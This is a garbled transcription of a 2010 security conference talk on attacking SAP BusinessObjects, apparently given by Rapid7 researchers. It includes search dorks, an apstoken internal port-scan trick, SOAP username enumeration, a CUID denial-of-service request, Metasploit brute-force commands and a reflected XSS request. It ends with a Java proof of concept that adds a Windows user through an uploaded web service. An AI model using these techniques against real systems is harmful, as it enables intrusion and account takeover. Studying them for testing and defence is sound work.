Transcription
Hacking SAP BusinessObjectsJoshua ‘Jabra’ Abraham - jabra@rapid7.comWillis Vandevanter – will@rapid7.com09/22/10
OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary
Standard DisclaimerDo not do anythingcontainedwithin thispresentationunless you havewrittenpermission!!
Who are We?Joshua “Jabra” Abraham – Security Consultant/ResearcherPenetration Testing , Web Application Audits and Security ResearcherBachelor of Science in Computer ScienceContributes to the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJSpeaker/Trainer at BlackHat, DefCon, ShmooCon, SANS Pentest Summit ,OWASPConferences, LinuxWorld, Infosec World, CSI and ComdexTwitter: http://twitter.com/jabra Blog: http://spl0it.wordpress.comWillis Vandevanter – Security Consultant/ResearcherPenetration Tester and Security ResearcherBSc in CS, Masters of CS in Secure Software EngineeringTwitter: http://twitter.com/willis (two underscores!!)
Rapid7 OverviewVulnerability ManagementOpen source projectsProfessional ServicesNetwork PentestingWeb Application AuditsTrainingDeployment
OverviewWhat we will discussWhat we will notdiscussThings to keep in mindBreaking stuff is coolDisclaimer
SAP Product SuiteEnterprise ResourcePlanningBusiness Intelligence (BI)Business SuiteCustomer RelationshipPlanningEnterprise Resource PlanningProduct LifecycleManagementSupply Chain ManagementSupplier RelationshipManagementR/3BusinessObjectsNetweaver
Focus of this talkSAP BusinessObjectsEnterprise XI (XI 3.2 isthe latest version)20,000 ft viewAggregating andanalyzing vast amounts ofdata along withpresentation of/providingaccess via manyinterfacesFlexible, Scalable, andAccessible
BO BI Architecture Overview
Interfaces we focused on
Central Management ConsoleAdministrative Interface toBOAccess is provided via thewebserver(http://ip:6405/CmcApp)authenticates against theCentral Management ServerProvidesUser and group creation andmanagementServer/ServicesConfigurationObject Rights, scheduling,security settings
Web ServicesProvides:Session HandlingAuth, User privilegemanagementBusiness IntelligencePlatformServer administration,scheduling, etc.Report EngineAccess reports (CrystalReports, WebIntelligence, etc.)QueryBuild ad hoc queries
Service Oriented Architecture 101Think Object Orientedover XMLAdd this on top of HTTPThat’s SOA!Connect LegacysystemsStep 2) Web ServiceRequestStep 1) User RequestStep 4) Web Server ResponseStep 3) Web ServiceResponseUser
SOAP 101Web ServicesAPI in XML over HTTPOSI Layer 8,9 and 10 Layer 8 – XMLLayer 9 – Security (WS-*)Layer 10 – SOAP“Wiz Dullz” (WSDLs)Data definitionsUDDIsPointers
Threat ModelWeb Services in TransitWeb Services EngineWeb Services DeploymentWeb Services User CodeReference: Hacking Web Services
SSL vs Message SecurityPoint-to-Point OR chained workflowSSL (All or nothing)No fine grained control of portions of the applicationsNo audit trailNode 2Node 3Ton of work!Add amounts of securityAudit trailNode 5Verify messages have not changed!Encrypt message body (admin attack)Node 4MessageNode 1
Tools of the TradeSOAP QA Testing toolsSOAPUIFavorite Programming LanguageCustom toolsProxiesOur favorite ethods-ofquick-exploitation-of-blind 25.html
Custom Web Services Client#!/usr/bin/ruby –wrequire 'soap/wsdlDriver'require 'pp‘wsdl �driver SOAP::WSDLDriverFactory.new(wsdl).create rpc driver# Log SOAP request and responsedriver.wiredump file base "soap-log.txt"# Use Burp proxy for all requestsdriver.httproxy 'http://localhost:8080'# Log SOAP request and responseresponse driver.GetQuote(:symbol 'MSFT')pp response
SOAPUI
BurpSuiteUsage with IntruderVerify the PRNG –SequencerEtc., etc.
X’s and O’s and Icebergs
X’s and O’s and Icebergs
X’s and O’s and Icebergs
OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary
Real-World PentestingEvil Attackers - BlackhatsFinancially MotivatedNot limited by amount of time and/or resourcesPen testers – WhitehatsContext / Goal Focused (experience, 6th sense, etc)Demonstrate real world risks, but limited by the time ofthe engagementA snapshot of the network/application at a point in time
Goal Oriented PentestingEmulate Blackhat, by using Goals as motivationDoesn’t replace experience / 6th sense elementsPentesting teams focus efforts on critical weaknessesNon-technical methodology in which process is centralfocusProvides best (ROI) for organizations when they conductpenetration assessments
Threat ModelLot of Entry points, weexamined a coupleDifferent Goals forDifferent FolksUnauthorized Access toInformationRemote Exploitation of BOServer and Internal PivotInformational Only (VersionFingerprinting, etc.)
OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary
Web Application Overview/CmcAppAdministrator interface/dswsbobjeWeb Services for BusinessObjectsNot installed by defaultRequires deployment of a war/InfoViewAppQuerying interface/AnalyticalReportingReporting interface
ReconnaissanceExternal and InternalEnumerationGoogle dorks foridentifying externallyaccessible instancesPort and applicationbased enumerationVersion FingerprintingBrowser basedWeb services based
Google DorksBusinessObjects –InfoViewApp interfaceinurl:infoviewappCrystal Reports filetype:cwrfiletype:cwr inurl:apstokenfiletype:cwr inurl:viewrptinurl:apspasswordfiletype:cwr inurl:initinurl:opendoc inurl:sType
Um, anyone wanta port scaninternally ?Google: filetype:cwr inurl:apstokenInternal port scanning (port 80)http://hostname/CrystalReports/viewrpt.cwr?id ID&wid WID&apstoken internal:80@ TOKENPort Closed Response :Server HOSTNAME:80 not found or server may be down (FWM 01003)internal port scanning (port 445)http://hostname/CrystalReports/viewrpt.cwr?id ID&wid WID&apstoken internal:445@ TOKENPort Open Response:# Unable to open a socket to talk to CMS HOSTNAME:445 (FWM 01005)
Unique ng8080/tcp/dswsbobje
Version Detection – Web /AnalyticalReporting merge web.xmlResponse: snip web-app context-param param-name applet.version /param-name param-value 12.1.0.828 /param-value /context-param /web-app
Version Detection – Web ServiceRequest:POST p. soapenv:Envelope xmlns:soapenv s 1" soapenv:Header/ soapenv:Body ns:getVersion/ /soapenv:Body /soapenv:Envelope Response: soapenv:Envelope xmlns:soapenv "http://schemas.xmlsoap.org/soap/envelope/" soapenv:Body getVersionResponse xmlns 1" Version 12.1.0 /Version /getVersionResponse /soapenv:Body /soapenv:Envelope
MSFv3 Version Detection Modulemsf use scanner/http/sap businessobjects version enumsap businessobjects version enum set RHOSTS 192.168.1.0/24sap businessobjects version enum runBased on using Dswsbobje (8080/tcp)Web Service Version request - Unauthenticated
Username EnumerationResponse tells you if the username is validValid Username/Invalid password/SOAP method only
Username EnumerationPOST /dswsbobje/services/session HTTP/1.1Content-Type: text/xml; charset UTF-8SOAPAction: 1/login"User-Agent: Axis2Host: x.x.x.x:8080Content-Length: 631 ?xml version '1.0' encoding 'UTF-8'? soapenv:Envelope xmlns:soapenv "http://schemas.xmlsoap.org/soap/envelope/" soapenv:Body login xmlns 1" credential xmlns 1"xmlns:ns 1"xmlns:xsi "http://www.w3.org/2001/XMLSchema-instance" Login "administrator"Password "PASSWORD1" xsi:type "ns:EnterpriseCredential" / version xmlns 1" BOE XI 3.0 /version /login /soapenv:Body /soapenv:Envelope
MSFv3 User Enumeration Modulesmsf use scanner/http/sap businessobjects user enumsap businessobjects user enum set RHOSTS 192.168.1.0/24sap businessobjects user enum set USERNAME administratorsap businessobjects version enum runBased on using Dswsbobje (8080/tcp)Web Service Login request
OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary
Unique Identifier (CUID)CUIDs – used similar to session ids for tasks thatare performed.Ability to request a specific number of CUIDs
Denial of Service AttackI’d like 100,000 CUIDs please!POST /dswsbobje/services/biplatform HTTP/1.1Content-Type: text/xml; charset ects.com/2007/06/01/GenerateCuids
DoS ?xml version '1.0' encoding 'UTF-8'? soapenv:Envelope xmlns:soapenv "http://schemas.xmlsoap.org/soap/envelope/" soapenv:Body GenerateCuids xmlns 6/01" SessionID xmlns 6/01" itdirs8l4vkou4%3A6400 %40it-dirs8l4vkou4%3A6400 hkJg2K28oTJ1Nq osca%3Aiiop%3A%2F%2Fitdirs8l4vkou4%3A6400%3BSI SESSIONID%3D2148JfhkJg2K28oTJ1Nq en US America/LosAngeles” /SessionID numCuids xmlns 6/01" 100000 /numCuids /GenerateCuids /soapenv:Body /soapenv:Envelope
Oracle SQL Injection Error CodesCatch interesting errorsORA-00921: unexpected end of SQL commandORA-00936: missing expressionORA-00933: SQL command not properly endedORA-00970, ORA-00907, ORA-01756, ORA-00923,ORA-00900, PLS-00103, LPX-00601, ORA-00604Crashes – for C codeORA-03113 – might also be an instance crashORA-03114, ORA-01012ORA-00600 – Internal /2008/12/UKOUG122008-slavik.pdf
MSFv3 User Bruteforce Modulemsf use scanner/http/sap businessobjects user brutesap businessobjects user brute set RHOSTS 192.168.1.0/24sap businessobjects user brute set USERNAME administratorsap businessobjects user brute set PASSWORD passwordsap businessobjects version brute runBased on using Dswsbobje (8080/tcp)Web Service Login request
MSFv3 User Bruteforce Module(Web)msf use scanner/http/sap businessobjects user websap businessobjects user web set RHOSTS 192.168.1.0/24sap businessobjects user web set USERNAME administratorsap businessobjects user web set PASSWORD passwordsap businessobjects version web runBased on using CmcApp (6405/tcp)Web Application Login request
Reflective Cross-Site ScriptingRequest:GET /dswsbobje/axis2admin/engagingglobally?modules "%3e%20%3cXSS%3e&submit Engage HTTP/1.1Host: x.x.x.x:8080.snip Response:.snip. p font color "blue" The system is attempting to engage a module that isnot available: " XSS /font /p !-.snip.
Persistent Cross Site Scripting
Persistent Cross Site Scripting
Remote Code ExecutionCross-Site Scripting isGreat, but we want ashell!!CmcAppServices for Upload andExec:InputFileRespositoryProgramJobServer not enabled by defaultTo execute an Exe,administrator credentialsrequired
CmcApp RCEYou can set program object specific logon details byediting the "Program Logon" property of an object.These authentication details are not required if thecredentials have been globally set(Applications CMC Program Object Rights "Schedule with the following Operating SystemCredentials").Reference: CMC Help Index program objects Java programs Authentication and programobjects
CmcApp Steps for RCE1. Log on to the server computer.2. Go to Control Panel Administrative Tools Local Security Policy.3. Under Security settings click Local Policies and then click User RightsAssignment.4. Add the domain user account to the following policy:a. Replace Process Level Token Policy.b. Log on as a batch job.c. Adjust memory quotas for a process.d. Access this computer from the network. (usually everyone by default)5. Go to the CCM and stop the Program Job Server.6. Right-click Program Job Server and then click Properties.7. Type the domain user account and password into the Log On As textbox.8. Now you can schedule a metric refresh.
DswsbobjeProvides Web Services for BusinessObjectsNot installed by defaultRequires:Deployment of warRequires Tomcat interfaceRemember the Tomcat Manager Vulnerability(tomcat/tomcat) Remote Code ExecutionOpens up a new n/login
Dswsbobje (think: dsw-s-bobje)Ability to administer web servicesModify web servicesDelete web services (already deployed)Add web services ( hmm that sounds handy! )Guess what . it is!
Remote Code Execution PoCpackage org.apache.axis2.axis2userguide;import java.io.IOException;public class AddUser {public AddUser() {}public void main() {Process process;try {process Runtime.getRuntime().exec("net user foo bar /add");}catch(IOException ioexception) {ioexception.printStackTrace();}return;}}
DEMO!http://spl0it.org/files/talks/source barcelona10/demo/RCE SAP BusinessObjects Dswsbobje.html
RCE Attack / RecommendationsAttack requires the following:Dswsbobje is deployed(It is deployed if you are using SOA!)Default administrator credentials are still in-placeRestart of Tomcat service are uploading malicious webserviceChange default credentials:C:\Program Files\Apache Software f\axis2.xml
Summary / QATechnical Methodology for pentesting SAPBusinessObjectsUnderstanding SOAP / SOA is a large portion ofHacking SAP BusinessObjectsSecurity Advisory to be released October 12th(www.rapid7.com)Metasploit Modules to be released October 12th(www.metasploit.com)
Comments/Questions?Joshua “Jabra” AbrahamJabra aT spl0it d0t orgJabra aT rapid7 d0t comCompany: http://www.rapid7.comBlog: http://spl0it.wordpress.comTwitter: http://twitter.com/jabraWillis VandevanterWill aT rapid7 d0t comTwitter: http://twitter.com/willis (twounderscores!)Company: http://www.rapid7.com
Joshua "Jabra" Abraham -Security Consultant/Researcher Penetration Testing , Web Application Audits and Security Researcher Bachelor of Science in Computer Science